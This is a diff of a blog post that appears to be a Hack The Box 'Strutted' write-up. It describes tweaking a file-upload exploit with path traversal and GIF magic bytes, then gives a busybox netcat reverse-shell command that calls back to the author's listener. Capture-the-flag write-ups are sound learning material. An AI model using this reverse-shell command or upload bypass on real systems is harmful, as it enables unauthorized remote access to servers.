BLUEBERRYP1LL/blueberryp1ll.github.io/_posts/2025-08-05-HTB-Strutted-writeup.md

 [-] Maximum attempts reached.
 Exiting...
 ```
 This was actually the hardest and longest part.
-Looking at script, I suspected the web root was deeper than expected, so I adjusted the number of parent directories in the path parameter, plus i added gif magic bytes to the script for the file_content parameter… and finally got it working:
+Looking at script, I suspected that it didn`t work because the web root was deeper than expected, so I adjusted the number of parent directories in the path parameter, plus i added gif magic bytes to the script for the file_content parameter… and finally got it working:

 <img width="1665" height="853" alt="2025-08-05 114246" src="https://github.com/user-attachments/assets/42d51827-fdb8-4f22-87a4-989c24a64baa" />

 <img width="1187" height="285" alt="2025-08-05 115534" src="https://github.com/user-attachments/assets/b9d8c57b-1ac8-4359-a113-0f5cd36fbf4d" />

 Started a local listener on port 9001 and used this command to get a reverse shell:
 ```bash
 CMD > busybox nc 10.10.14.73 9001 -e /bin/bash